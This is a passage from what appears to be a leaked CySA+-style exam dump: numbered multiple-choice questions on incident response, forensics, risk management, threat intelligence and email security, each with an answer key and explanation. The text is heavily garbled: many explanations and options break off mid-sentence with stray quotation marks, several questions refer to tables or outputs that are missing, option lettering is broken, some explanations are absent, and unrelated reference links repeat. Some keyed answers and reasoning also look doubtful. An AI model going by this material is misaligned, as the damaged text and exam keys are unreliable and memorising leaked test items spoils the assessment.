C. Include a table of contents outlining the entire report
D. Decide on the color scheme that will effectively communicate the metrics

Correct Answer: A
Explanation

Explanation/Reference:
The best way to begin preparati"" regarding a recent incident involving a cybersecurity breach is to
determine the sophistication of the audience that the report is meant for. The sophistication of the audience
refers to their level of technical knowledge, understanding, or interest in cybersecurity topics. Determining
the sophistication of the audience can help tailor the report content, language, tone, and format to suit their
needs and expectations. For example, a report for executive management may be more concise, high-
level, and businessoriented than a report for technical staff or peers.

QUESTION 46
A security analyst is performing an investigation involving multiple targeted Windows malware binaries.
The analyst wants to gather intelligence without disclosing information to the attackers. Which of the
following actions would allow the analyst to achieve the objective?

A. Upload the binary to an air gapped sandbox for analysis

B. Send the binaries to the antivirus vendor
C. Execute the binaries on an environment with internet connectivity
D. Query the file hashes using VirusTotal

Correct Answer: A
Explanation

Explanation/Reference:
The best action that would allow the analyst to gather intelligence without disclosing information to the
attackers is to upload the binary to an air gapped sandbox for analysis. An air gapped sandbox is an
isolated environment that has no connection to any external network or system. Uploading the binary to an
air gapped sandbox can prevent any communication or interaction between the binary and the attackers,
as well as any potential harm or infection to other systems or networks. An air gapped sandbox can also
allow the analyst to safely analyze and observe the behavior, functionality, or characteristics of the binary.
QUESTION 47
Which of the following would help to minimize human engagement and aid in process improvement in
security operations?

A. OSSTMM
B. SIEM
C. SOAR
D. QVVASP

Correct Answer: C
Explanation

Explanation/Reference:
SOAR stands for security orchestration, automation, and response, which is a term that describes a set of
tools, technologies, or platforms that can help streamline, standardize, and automate security operations
and incident response processes and tasks. SOAR can help minimize human engagement and aid in
process improvement in security operations by reducing manual work, human errors, response time, or
complexity. SOAR can also help enhance collaboration, coordination, efficiency, or effectiveness of
security operations and incident response teams.

QUESTION 48
After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security
Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of
the following risk management principles did the CISO select?

A. Avoid
B. Transfer
C. Accept
D. Mitigate

Correct Answer: A
Explanation

Explanation/Reference:
Avoid is a risk management principle that describes the decision or action of not engaging in an activity or
accepting a risk that is deemed too high or unacceptable. Avoiding a risk can eliminate the possibility or
impact of the risk, as well as the need for any further risk management actions. In this case, the CISO
decided the risk score would be too high and refused the software request. This indicates that the CISO
selected the avoid principle for risk management.

QUESTION 49
Which of the following is an important aspect that should be included in the lessons-learned step after an
incident?

A. Identify any improvements or changes in the incident response plan or procedures

B. Determine if an internal mistake was made and who did it so they do not repeat the error
C. Present all legal evidence collected and turn it over to iaw enforcement
D. Discuss the financial impact of the incident to determine if security controls are well spent

Correct Answer: A
Explanation

Explanation/Reference:
An important aspect that should be included in the lessons-learned step after an incident is to identify any
improvements or changes in the incident response plan or procedures. The lessonslearned step is a
process that involves reviewing and evaluating the incident response activities and outcomes, as well as
identifying and documenting any strengths, weaknesses, gaps, or best practices. Identifying any
improvements or changes in the incident response plan or procedures can help enhance the security
posture, readiness, or capability of the organization for future incidents
QUESTION 50
The security operations team is required to consolidate several threat intelligence feeds due to redundant
tools and portals. Which of the following will best achieve the goal and maximize results?

A. Single pane of glass

B. Single sign-on
C. Data enrichment
D. Deduplication

Correct Answer: D
Explanation

Explanation/Reference:
Deduplication is a process that involves removing any duplicate or redundant data or information from a
data set or source. Deduplication can help consolidate several threat intelligence feeds by eliminating any
overlapping or repeated indicators of compromise (IoCs), alerts, reports, or recommendations.
Deduplication can also help reduce the volume and complexity of threat intelligence data, as well as
improve its quality, accuracy, or relevance.

QUESTION 51
Which of the following would a security analyst most likely use to compare TTPs between different known
adversaries of an organization?

A. MITRE ATTACK
B. Cyber Kill Cham
C. OWASP
D. STIXTAXII

Correct Answer: A
Explanation

Explanation/Reference:
MITRE ATT&CK is a framework and knowledge base that describes the tactics, techniques, and
procedures (TTPs) used by various adversaries in cyberattacks. MITRE ATT&CK can help security
analysts compare TTPs between different known adversaries of an organization, as well as identify
patterns, gaps, or trends in adversary behavior. MITRE ATT&CK can also help security analysts improve
threat detection, analysis, and response capabilities, as well as share threat intelligence with other
organizations or communities

QUESTION 52
An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability
and is actively removing it from the system. Which of the following steps of the process does this describe?

A. Eradication
B. Recovery
C. Containment
D. Preparation

Correct Answer: A
Explanation

Explanation/Reference:
Eradication is a step in the incident response process that involves removing any traces or remnants of the
incident from the affected systems or networks, such as malware, backdoors, compromised accounts, or
malicious files. Eradication also involves restoring the systems or networks to their normal or secure state,
as well as verifying that the incident is completely eliminated and cannot recur. In this case, the analyst is
remediating items associated with a recent incident by isolating the vulnerability and actively removing it
from the system. This describes the eradication step of the incident response process.
QUESTION 53
Joe, a leading sales person at an organization, has announced on social media that he is leaving his
current role to start a new company that will compete with his current employer. Joe is soliciting his current
employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet.
Which of the following would be the best action for the incident response team to recommend?

A. Isolate Joe's PC from the network

B. Reimage the PC based on standard operating procedures
C. Initiate a remote wipe of Joe's PC using mobile device management
D. Perform no action until HR or legal counsel advises on next steps

Correct Answer: D
Explanation

Explanation/Reference:
The best action for the incident response team to recommend in this scenario is to perform no action until
HR or legal counsel advises on next steps. This action can help avoid any potential legal or ethical issues,
such as violating employee privacy rights, contractual obligations, or organizational policies. This action
can also help ensure that any evidence or information collected from the "of any legal action or dispute.
The incident response team should consult with HR or legal counsel before taking any action that may "

QUESTION 54
The Chief Information Security Officer is directing a new program to reduce attack surface risks and
threats as part of a zero trust approach. The IT security team is required to come up with priorities for the
program. Which of the following is the best priority based on common attack frameworks?

A. Reduce the administrator and privileged access accounts

B. Employ a network-based IDS
C. Conduct thorough incident response
D. Enable SSO to enterprise applications

Correct Answer: A
Explanation

Explanation/Reference:
The best priority based on common attack frameworks for a new program to reduce attack surface risks
and threats as part of a zero trust approach is to reduce the administrator and privileged access accounts.
Administrator and privileged access accounts are accounts that have elevated permissions or capabilities
to perform sensitive or critical tasks on systems or networks, such as installing software, changing
configurations, accessing data, or granting access. Reducing the administrator and privileged access
accounts can help minimize the attack surface, as it can limit the number of potential targets or entry points
for attackers, as well as reduce the impact or damage of an attack if an account is compromised.

QUESTION 55
During an extended holiday break, a company suffered a security incident. This information was properly
relayed to appropriate personnel in a timely manner and the server was up to date and configured with
appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what
happened. Which of the following actions should the analyst take first?

A. Clone the virtual server for forensic analysis

B. Log in to the affected server and begin analysis of the logs
C. Restore from the last known-good backup to confirm there was no loss of connectivity
D. Shut down the affected server immediately

Correct Answer: A
Explanation

Explanation/Reference:
The first action that the analyst should take in this case is to clone the virtual server for forensic analysis.
Cloning the virtual server involves creating an exact" state at a specific point in time. Cloning the virtual
server can help preserve and protect any evidence or information related to the security incident, as well
as prevent any tampering, contamination, or destruction of evidence. Cloning the virtual server can also
allow the analyst to safely analyze and investigate the incident without affecting the original server or its
operations.

QUESTION 56
A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular
outgoing HTTPS connections from one of the servers to a public IP address. The server should not be
making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around
the clock during work hours as well. Which of the following is the most likely explanation?

A. C2 beaconing activity
B. Data exfiltration
C. Anomalous activity on unexpected ports
D. Network host IP address scanning
E. A rogue network device

Correct Answer: A
Explanation

Explanation/Reference:
The most likely explanation for this traffic pattern is C2 beaconing activity. C2 stands for command and
control, which is a phase of the Cyber Kill Chain that involves the adversary attempting to establish
communication with a successfully exploited target. C2 beaconing activity is a type of network traffic that
indicates a compromised system is sending periodic messages or signals to an " protocols, such as HTTP
(S), DNS, ICMP, or UDP. C2 beaconing activity can enable the attacker to remotely control or manipulate
the target system or network using various methods, such as malware callbacks, backdoors, botnets, or
covert channels.

QUESTION 57
New employees in an organization have been consistently plugging in personal webcams despite the
company policy prohibiting use of personal devices. The SOC manager discovers that new employees are
not aware of the company policy. Which of the following will the SOC manager most likely recommend to
help ensure new employees are accountable for following the company policy?

A. Human resources must email a copy of a user agreement to all new employees
B. Supervisors must get verbal confirmation from new employees indicating they have read the user
agreement
C. All new employees must take a test about the company security policy during the cjitoardmg process
D. All new employees must sign a user agreement to acknowledge the company security policy

Correct Answer: D
Explanation

Explanation/Reference:
The best action that the SOC manager can recommend to help ensure new employees are accountable for
following the company policy is to require all new employees to sign a user agreement to acknowledge the
company security policy. A user agreement is a document that defines the rights and responsibilities of the
users regarding " networks, or resources, as well as the consequences of violatin" Signing a user
agreement can help ensure new employees are aware of and agree to comply with the company security
policy, as well as hold them accountable for any breaches or incidents caused by their actions or inactions.

QUESTION 58
An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief
Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used
in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following
would be the best threat intelligence source to learn about this new campaign?

A. Information sharing organization

B. Blogs/forums
C. Cybersecuritv incident response team
D. Deep/dark web

Correct Answer: A
Explanation

Explanation/Reference:
An information sharing organization is a group or network of organizations that share threat intelligence,
best practices, or lessons learned related to cybersecurity issues or incidents. An information sharing
organization can help security analysts learn about new ransomware campaigns or other emerging threats,
as well as get recommendations or guidance on how to prevent, detect, or respond to them. An information
sharing organization can also help security analysts collaborate or coordinate with other organizations in
the same industry or region that may face similar threats or challenges.

QUESTION 59
An incident response team finished responding to a significant security incident. The management team
has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the
following is the most likely reason to include lessons learned?

A. To satisfy regulatory requirements for incident reporting

B. To hold other departments accountable
C. To identify areas of improvement in the incident response process
D. To highlight the notable practices of the organization's incident response team

Correct Answer: C
Explanation

Explanation/Reference:
The most likely reason to include lessons learned in an after-action report is to identify areas of
improvement in the incident response process. The lessons learned process is a way of reviewing and
evaluating the incident response activities and outcomes, as well as identifying and documenting any
strengths, weaknesses, gaps, or best practices. Identifying areas of improvement in the incident response
process can help enhance the security posture, readiness, or capability of the organization for future
incidents, as well as provide feedback or recommendations on how to address any issues or challenges.

QUESTION 60
A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans.
Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:

Additionally, the vulnerability management team feels that the metrics Smear and Channing are less
important than the others, so these will be lower in priority. Which of the following vulnerabilities should be
patched first, given the above third-party scoring system?
A. InLoud:
Cobain: Yes
Grohl: No
Novo: Yes
Smear: Yes
Channing: No
B. TSpirit:
Cobain: Yes
Grohl: Yes
Novo: Yes
Smear: No
Channing: No
C. ENameless:
Cobain: Yes
Grohl: No
Novo: Yes
Smear: No
Channing: No
D. PBleach:
Cobain: Yes
Grohl: No
Novo: No
Smear: No
Channing: Yes

Correct Answer: B
Explanation

Explanation/Reference:
The vulnerability that should be patched first, given the above third-party scoring system, is:
TSpirit: Cobain: Yes Grohl: Yes Novo: Yes Smear: No Channing: No This vulnerability has three out of five
metrics marked as Yes, which indicates a high severity level. The metrics Cobain, Grohl, and Novo are
more important than Smear and Channing, according to the vulnerability management team. Therefore,
this vulnerability poses a greater risk than the other vulnerabilities and should be patched first.

QUESTION 61
A user downloads software that contains malware onto a computer that eventually infects numerous other
systems. Which of the following has the user become?

A. Hacklivist
B. Advanced persistent threat
C. Insider threat
D. Script kiddie

Correct Answer: C
Explanation

Explanation/Reference:
The user has become an insider threat by downloading software that contains malware onto a computer
that eventually infects numerous other systems. An insider threat is a person or entity that " or resources
and uses that access to cause harm or damage to the organization. An insider threat can be intentional or
unintentional, malicious or negligent, and can result from various actions or behaviors, such as
downloading unauthorized software, violating security policies, stealing data, sabotaging systems, or
collaborating with external attackers.

QUESTION 62
An organization has activated the CSIRT. A security analyst believes a single virtual server was
compromised and immediately isolated from the network. Which of the following should the CSIRT conduct
next? A Take a snapshot of the compromised server and verify its integrity
A. Restore the affected server to remove any malware
B. Contact the appropriate government agency to investigate
C. Research the malware strain to perform attribution

Correct Answer: A
Explanation

Explanation/Reference:
The next action that the CSIRT should conduct after isolating the compromised server from the network is
to take a snapshot of the compromised server and verify its integrity. Taking a snapshot of the
compromised server involves creating an exact copy or image" specific point in time. Verifying its integrity
involves ensuring that the snapshot has not been altered, corrupted, or tampered with during or after its
creation. Taking a snapshot and verifying its integrity can help preserve and protect any evidence or
information related to the incident, as well as prevent any tampering, contamination, or destruction of
evidence.

QUESTION 63
During an incident, an analyst needs to acquire evidence for later investigation. Which of the following
must be collected first in a computer system, related to its volatility level?

A. Disk contents
B. Backup data
C. Temporary files
D. Running processes

Correct Answer: D
Explanation

Explanation/Reference:
The most volatile type of evidence that must be collected first in a computer system is running processes.
Running processes are programs or applications that are currently executing on a computer system and
using its resources, such as memory, CPU, disk space, or network bandwidth. Running processes are very
volatile because they can change rapidly or disappear completely when the system is shut down, rebooted,
logged off, or crashed. Running processes can also be affected by other processes or users that may
modify or terminate them. Therefore, running processes must be collected first before any other type of
evidence in a computer system

QUESTION 64
A security analyst is trying to identify possible network addresses from different source networks belonging
to the same company and region.

Which of the following shell script functions could help achieve the goal?

A. function x() { b=traceroute -m"" }

B. "u.com TXT +short }
C. function z() { c=$(geoip" }

Correct Answer: B
Explanation

Explanation/Reference:
The shell script function that could help identify possible network addresses from different source networks
belonging to the same company and region is:

"u.com TXT +short }

This function takes an IP address as an argument and performs two DNS lookups using the dig command.
The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with
the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system
number (ASN) and other information related to the IP address, such as the country code, registry, or
allocation date. The function then prints the IP address and the ASN information, which can help identify
any network addresses that belong to the same ASN or region

QUESTION 65
A security analyst is writing a shell script to identify IP addresses from the same country. Which of the
following functions would help the analyst achieve the objective?

A. function w() { info=$(pi" " }

B. function x() { info=$(geoipl" }
C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && " }
D. function z() { info=$(tracer""" }

Correct Answer: B
Explanation

Explanation/Reference:
The function that would help the analyst identify IP addresses from the same country is:
function x() { info=$(geoiplookup $" }
This function takes an IP address as an argument and uses the geoiplookup command to get the
geographic location information associated with the IP address, such as the country name, country code,
region, city, or latitude and longitude. The function then prints the IP address and the geographic location
information, which can help identify any IP addresses that belong to the same country.

QUESTION 66
A security analyst obtained the following table of results from a recent vulnerability assessment that was
conducted against a single web server in the environment:

Which of the following should be completed first to remediate the findings?

A. Ask the web development team to update the page contents

B. Add the IP address allow listing for control panel access
C. Purchase an appropriate certificate from a trusted root CA
D. Perform proper sanitization on all fields

Correct Answer: D
Explanation

Explanation/Reference:
The first action that should be completed to remediate the findings is to perform proper sanitization on all
fields. Sanitization is a process that involves validating, filtering, or encoding any user input or data before
processing or storing it on a system or application. Sanitization can help prevent various types of attacks,
such as cross-site scripting (XSS), SQL injection, or command injection, that exploit unsanitized input or
data to execute malicious scripts, commands, or queries on a system or application. Performing proper
sanitization on all fields can help address the most critical and common vulnerability found during the
vulnerability assessment, which is XSS.

QUESTION 67
A user reports a malware alert to the help desk. A technician verities the alert, determines the workstation
is classified as a low-severity device, and uses network controls to block access. The technician then
assigns the ticket to a security analyst who will complete the eradication and recovery processes. Which of
the following should the security analyst do next?

A. Document the procedures and walk through the incident training guide.
B. Reverse engineer the malware to determine its purpose and risk to the organization.
C. Sanitize the workstation and verify countermeasures are restored.
D. Isolate the workstation and issue a new computer to the user.

Correct Answer: C
Explanation

Explanation/Reference:
Sanitizing the workstation and verifying countermeasures are restored are part of the eradication and
recovery processes that the security analyst should perform next. Eradication is the process of removing
malware or other threats from the affected systems, while recovery is the process of restoring normal
operations and functionality to the affected systems. Sanitizing the workstation can involve deleting or
wiping any malicious files or programs, while verifying countermeasures are restored can involve checking
and updating any security controls or settings that may have been compromised .
https://www.cynet.com/incident-response/incident-response-sans-the-6-steps-in-depth/

QUESTION 68
A digital forensics investigator works from duplicate images to preserve the integrity of the original
evidence. Which of the following types of media are most volatile and should be preserved? (Select two).

A. Memory cache
B. Registry file
C. SSD storage
D. Temporary filesystems
E. Packet decoding
F. Swap volume

Correct Answer: AF
Explanation

Explanation/Reference:
Memory cache and swap volume are types of media that are most volatile and should be preserved during
a digital forensics investigation. Volatile media are those that store data temporarily and lose their contents
when the power is turned off or interrupted. Memory cache is a small and fast memory that stores
frequently used data or instructions for faster access by the processor. Swap volume is a part of the hard
disk that is used as an extension of the memory when the memory is full or low .
https://www.techopedia.com/definition39/memory-dump

QUESTION 69
A development team recently released a new version of a public-facing website for testing prior to
production. The development team is soliciting the help of various teams to validate the functionality of the
website due to its high visibility.
Which of the following activities best describes the process the development team is initiating?

A. Static analysis
B. Stress testing
C. Code review
D. User acceptance testing
Correct Answer: D
Explanation

Explanation/Reference:
User acceptance testing is a process of verifying that a software application meets the requirements and
expectations of the end users before it is released to production. User acceptance testing can help to
validate the functionality, usability, performance and compatibility of the software application with real-
world scenarios and feedback . User acceptance testing can involve various teams, such as developers,
testers, customers and stakeholders. https://www.techopedia.com/ definition7/user-acceptance-testing-uat

QUESTION 70
A security technician is testing a solution that will prevent outside entities from spoofing the company's
email domain, which is compatia.org. The testing is successful, and the security technician is prepared to
fully implement the solution.
Which of the following actions should the technician take to accomplish this task?

A. Add TXT @ "v=spfl mx include:_spf.comptia. org -all" to the DNS record.

B. Add : XT @ "v=spfl mx include:_sp?comptia.org -al"; to the email server.
C. Add TXT @ "v=spfl mx include:_sp?comptia.org +al"; to the domain controller.
D. AddTXT @ "v=apfl mx lnclude:_spf .comptia.org +a 11" to the web server.

Correct Answer: A
Explanation

Explanation/Reference:
" to the DNS record can help to prevent
outside entities from spoofing t"ich is comptia.org. This is an example of a Sender Policy Framework (SPF)
record, which is a type of DNS record that specifies which mail servers are authorized to send email on
behalf of a domain. SPF records can help to prevent spoofing by allowing the recipient mail servers to
check the validity of" " at the end of the SPF record indicates that any mail server that is not listed in the
SPF record is not authorized to send email for comptia.org .
https://www.cloudflare.com/learning/ssl/what-is-domain-spoofing/

QUESTION 71
A security analyst who works in the SOC receives a new requirement to monitor for indicators of
compromise. Which of the following is the first action the analyst should take in this situation?

A. Develop a dashboard to track the indicators of compromise.

B. Develop a query to search for the indicators of compromise.
C. Develop a new signature to alert on the indicators of compromise.
D. Develop a new signature to block the indicators of compromise.

Correct Answer: B
Explanation

Explanation/Reference:
Developing a query to search for the indicators of compromise is the first action the analyst should take in
this situation. Indicators of compromise (IOCs) are pieces of information that suggest a system or network
has been compromised by an attacker. IOCs can include IP addresses, domain names, file hashes, URLs,
or other artifacts that are associated with malicious activity. Developing a query to search for IOCs can
help to identify any potential incidents or threats in the environment and initiate further investigation or
response .
https://www.crowdstrike.com/cybersecurity-101/incident-response/indicators-ofcompromise/

QUESTION 72
During an investigation, an analyst discovers the following rule in an executive's email client:
The executive is not aware of this rule. Which of the following should the analyst do first to evaluate the
potential impact of this security incident?

A. Check the server logs to evaluate which emails were sent to <someaddress@domain,com>.
B. Use the SIEM to correlate logging events from the email server and the domain server.
C. Remove the rule from the email client and change the password.
D. Recommend that the management team implement SPF and DKIM.

Correct Answer: C
Explanation

QUESTION 73
A security analyst is investigating a compromised Linux server. The analyst issues the ps command and
receives the following output:

Which of the following commands should the administrator run next to further analyze the compromised
system?

A. gbd /proc1
B. rpm -V openssh-server
C. /bin/Is -1 /proc1/exe
D. kill -9 1301

Correct Answer: C
Explanation

Explanation/Reference:
/bin/ls -1 /proc1/exe is the command that will show the absolute path to the executed binary file associated
with the process ID 1301, which is ./usr/sbin/sshd. This information can help the security analyst determine
if the binary is an official version and has not been modified, which could be an indicator of a
compromise. /proc1/exe is a special symbolic link that points to the executable file that was used to start
the process 1301 .
https://unix.stackexchange.com/questions854/how-does-the-proc-pid-exe-symlinkdiffer-from-ordinary-
symlinks

QUESTION 74
The following output is from a tcpdump al the edge of the corporate network:
Which of the following best describes the potential security concern?

A. Payload lengths may be used to overflow buffers enabling code execution.

B. Encapsulated traffic may evade security monitoring and defenses
C. This traffic exhibits a reconnaissance technique to create network footprints.
D. The content of the traffic payload may permit VLAN hopping.

Correct Answer: B
Explanation

Explanation/Reference:
Encapsulated traffic may evade security monitoring and defenses by hiding or obfuscating the actual
content or source of the traffic. Encapsulation is a technique that wraps data packets with additional
headers or protocols to enable communication across different network types or layers. Encapsulation can
be used for legitimate purposes, such as tunneling, VPNs, or NAT, but it can also be used by attackers to
bypass security controls or detection mechanisms that are not able to inspect or analyze the encapsulated
traffic .
https://www.techopedia.com/definition39/memory-dump

QUESTION 75
A company's threat team has been reviewing recent security incidents and looking for a common theme.
The team discovered the incidents were caused by incorrect configurations on the impacted systems. The
issues were reported to support teams, but no action was taken. Which of the following is the next step the
company should take to ensure any future issues are remediated?

A. Require support teams to develop a corrective control that ensures security failures are addressed
once they are identified.
B. Require support teams to develop a preventive control that ensures new systems are built with the
required security configurations.
C. Require support teams to develop a detective control that ensures they continuously assess systems
for configuration errors.
D. Require support teams to develop a managerial control that ensures systems have a documented
configuration baseline.

Correct Answer: A
Explanation

Explanation/Reference:
Requiring support teams to develop a corrective control that ensures security failures are addressed once
they are identified is the best step to prevent future issues from being remediated. Corrective controls are
actions or mechanisms that are implemented after a security incident or failure has occurred to fix or
restore the normal state of the system or network. Corrective controls can include patching, updating,
repairing, restoring, or reconfiguring systems or components that were affected by the incident or failure .
https://www.techopedia.com/definition39/memory-dump
QUESTION 76
A product manager is working with an analyst to design a new application that will perform as a data
analytics platform and will be accessible via a web browser. The product manager suggests using a PaaS
provider to host the application.
Which of the following is a security concern when using a PaaS solution?

A. The use of infrastructure-as-code capabilities leads to an increased attack surface.

B. Patching the underlying application server becomes the responsibility of the client.
C. The application is unable to use encryption at the database level.
D. Insecure application programming interfaces can lead to data compromise.

Correct Answer: D
Explanation

Explanation/Reference:
Insecure application programming interfaces (APIs) can lead to data compromise when using a PaaS
solution. APIs are interfaces that allow applications to communicate with each other and with the
underlying platform. APIs can expose sensitive data or functionality to unauthorized or malicious users if
they are not properly designed, implemented, or secured. Insecure APIs can result in data breaches,
denial of service, unauthorized access, or code injection . https://spot.io/ resources/cloud-security/paas-
security-threats-solutions-and-bestpractices/

QUESTION 77
A security analyst performs a weekly vulnerability scan on a network that has 240 devices and receives a
report with 2.450 pages. Which of the following would most likely decrease the number of false positives?

A. Manual validation
B. Penetration testing
C. A known-environment assessment
D. Credentialed scanning

Correct Answer: D
Explanation

Explanation/Reference:
Credentialed scanning is a method of vulnerability scanning that uses valid user credentials to access the
target systems and perform a more thorough and accurate assessment of their security posture.
Credentialed scanning can help to reduce the number of false positives by allowing the scanner to access
more information and resources on the systems, such as configuration files, registry keys, installed
software, patches, and permissions .
https://www.tenable.com/blog/credentialed-vulnerability-scanning-what-why-and-how

QUESTION 78
An organization wants to move non-essential services into a cloud computing environment. The
management team has a cost focus and would like to achieve a recovery time objective of 12 hours. Which
of the following cloud recovery strategies would work best to attain the desired outcome?

A. Duplicate all services in another instance and load balance between the instances.
B. Establish a hot site with active replication to another region within the same cloud provider.
C. Set up a warm disaster recovery site with the same cloud provider in a different region.
D. Configure the systems with a cold site at another cloud provider that can be used for failover.

Correct Answer: C
Explanation

Explanation/Reference:
Setting up a warm disaster recovery site with the same cloud provider in a different region can help to
achieve a recovery time objective (RTO) of 12 hours while keeping the costs low. A warm disaster
recovery site is a partially configured site that has some of the essential hardware and software
components ready to be activated in case of a disaster. A warm site can provide faster recovery than a
cold site, which has no preconfigured components, but lower costs than a hot site, which has fully
configured and replicated components. Using the same cloud provider can help to simplify the migration
and synchronization processes, while using a different region can help to avoid regional outages or
disasters .
https://www.techopedia.com/definition39/memory-dump

QUESTION 79
A security analyst discovers the company's website is vulnerable to cross-site scripting. Which of the
following solutions will best remedy the vulnerability?

A. Prepared statements
B. Server-side input validation
C. Client-side input encoding
D. Disabled JavaScript filtering

Correct Answer: B
Explanation

Explanation/Reference:
Server-side input validation is a solution that can prevent cross-site scripting (XSS) vulnerabilities by
checking and filtering any user input that is sent to the server before rendering it on a web page. Server-
side input validation can help to ensure that the user input conforms to the expected format, length and
type, and does not contain any malicious characters or syntax that may alter the logic or behavior of the
web page. Server-side input validation can also reject or sanitize any input that does not meet the
validation criteria .
https://portswigger.net/web-security/cross-site-scripting/preventing

QUESTION 80
An organization supports a large number of remote users. Which of the following is the best option to
protect the data on the remote users' laptops?

A. Require the use of VPNs.

B. Require employees to sign an NDA.
C. Implement a DLP solution.
D. Use whole disk encryption.

Correct Answer: D
Explanation

Explanation/Reference:
Using whole disk encryption is the best option to protect the d" Whole disk encryption is a technique that
encrypts all data on a hard disk drive, including the operating system, applications and files. Whole disk
encryption can prevent unauthorized access to the data if the laptop is lost, stolen or compromised. Whole
disk encryption can also protect the data from physical attacks, such as removing the hard disk and
connecting it to another device .
https://www.techopedia.com/definition39/memory-dump

QUESTION 81
A security analyst is monitoring a company's network traffic and finds ping requests going to accounting
and human resources servers from a SQL server. Upon investigation, the analyst discovers a technician
responded to potential network connectivity issues. Which of the following is the best way for the security
analyst to respond?

A. Report this activity as a false positive, as the activity is legitimate.

B. Isolate the system and begin a forensic investigation to determine what was compromised.
C. Recommend network segmentation to the management team as a way to secure the various
environments.
D. Implement host-based firewalls on all systems to prevent ping sweeps in the future.

Correct Answer: A
Explanation

Explanation/Reference:
Reporting this activity as a false positive, as the activity is legitimate, is the best way for the security analyst
to respond. A false positive is a condition in which harmless traffic is classified as a potential network
attack by a security monitoring tool. Ping requests are a common network diagnostic tool that can be used
to test network connectivity issues. The technician who responded to potential network connectivity issues
was performing a legitimate task and did not pose any threat to the accounting and human resources
servers .
https://www.techopedia.com/definition39/memory-dump

QUESTION 82
Which of the following software assessment methods world peak times?

A. Security regression testing

B. Stress testing
C. Static analysis testing
D. Dynamic analysis testing
E. User acceptance testing

Correct Answer: B
Explanation

Explanation/Reference:
Stress testing is a software assessment method that tests how an application performs under peak times
or extreme workloads. Stress testing can help to identify any performance issues, bottlenecks, errors or
crashes that may occur when an application faces high demand or concurrent users. Stress testing can
also help to determine the maximum capacity and scalability of an application .
https://www.techopedia.com/definition39/memory-dump

QUESTION 83
During an incident response procedure, a security analyst acquired the needed evidence from the hard
drive of a compromised machine. Which of the following actions should the analyst perform next to ensure
the data integrity of the evidence?

A. Generate hashes for each file from the hard drive.

B. Create a chain of custody document.
C. Determine a timeline of events using correct time synchronization.
D. Keep the cloned hard drive in a safe place.

Correct Answer: A
Explanation

Explanation/Reference:
Generating hashes for each file from the hard drive is the next action that the analyst should perform to
ensure the data integrity of the evidence. Hashing is a technique that produces a unique and fixedlength
value for a given input, such as a file or a message. Hashing can help to verify the data integrity of the
evidence by comparing the hash values of the original and copied files. If the hash values match, then the
evidence has not been altered or corrupted. If the hash values differ, then the evidence may have been
tampered with or damaged .

QUESTION 84
As a proactive threat-hunting technique, hunters must develop situational cases based on likely attack
scenarios derived from the available threat intelligence information. After forming the basis of the scenario,
which of the following may the threat hunter construct to establish a framework for threat assessment?

A. Critical asset list

B. Threat vector
C. Attack profile
D. Hypothesis
Correct Answer: D
Explanation

Explanation/Reference:
A hypothesis is a statement that can be tested by threat hunters to establish a framework for threat
assessment. A hypothesis is based on situational awareness and threat intelligence information, and
describes a possible attack scenario that may affect the organization. A hypothesis can help to guide threat
hunters in their investigation by providing a clear and specific question to ans" there any evidence of
lateral" https://www.crowdstrike.com/blog/tech-center/threat-hunting- hypothesisdevelopment/

QUESTION 85
A company creates digitally signed packages for its devices. Which of the following best describes the
method by which the security packages are delivered to the company's customers?

A. Antitamper mechanism
B. SELinux
C. Trusted firmware updates
D. eFuse

Correct Answer: C
Explanation

Explanation/Reference:
Trusted firmware updates are a method by which security package" customers. Trusted firmware updates
are digitally signed packages that contain software updates or patches for devices, such as routers,
switches, or firewalls. Trusted firmware updates can help to ensure the authenticity and integrity of the
packages by verifying the digital signature of the sender and preventing unauthorized or malicious
modifications to the packages . https://www.cisco.com/c/en/us/td/docs/ ios-xml/ios/sec_usr_trustsec/
configuration/xe-16/sec-usr-trustsec-xe-16-book/sec-trust-firm-upd.html

QUESTION 86
During an audit, several customer order forms were found to contain inconsistencies between the actual
price of an item and the amount charged to the customer. Further investigation narrowed the cause of the
issue to manipulation of the public-facing web form used by customers to order products. Which of the
following would be the best way to locate this issue?

A. Reduce the session timeout threshold

B. Deploy MFA for access to the web server.
C. Implement input validation.
D. Run a dynamic code analysis.

Correct Answer: D
Explanation

QUESTION 87
A Chief Information Security Officer (CISO) is concerned about new privacy regulations that apply to the
company. The CISO has tasked a security analyst with finding the proper control functions to verify that a
user's data is not altered without the user's consent. Which of the following would be an appropriate course
of action?

A. Automate the use of a hashing algorithm after verified users make changes to their data.
B. Use encryption first and then hash the data at regular, defined times.
C. Use a DLP product to monitor the data sets for unauthorized edits and changes.
D. Replicate the data sets at regular intervals and continuously compare the copies for unauthorized
changes.

Correct Answer: A
Explanation
Explanation/Reference:
Automating the use of a hashing algorithm after verified users make changes to their data is an appropriate
course of action to ve" Hashing is a technique that produces a unique and fixed-length value for a given
input, such as a file or a message. Hashing can help to verify the data integrity by comparing the hash
values of the original and modified data. If the hash values match, then the data has not been altered
without the "lues differ, then the data may have been tampered with or corrupted .

QUESTION 88
A Chief Information Officer wants to implement a BYOD strategy for all company laptops and mobile
phones. The Chief Information Security Officer is concerned with ensuring all devices are patched and
running some sort of protection against malicious software. Which of the following existing technical
controls should a security analyst recommend to best meet all the requirements?

A. EDR
B. Port security
C. NAC
D. Segmentation

Correct Answer: A
Explanation

Explanation/Reference:
EDR stands for endpoint detection and response, which is a type of security solution that monitors and
protects all devices that are connected to a network, such as laptops and mobile phones. EDR can help to
ensure that all devices are patched and running some sort of protection against malicious software by
providing continuous visibility, threat detection, incident response, and remediation capabilities. EDR can
also help to enforce security policies and compliance requirements across all devices .
https://www.crowdstrike.com/epp-101/what-is-endpoint-detection-and-response-edr/

QUESTION 89
A security analyst discovers the accounting department is hosting an accounts receivable form on a public
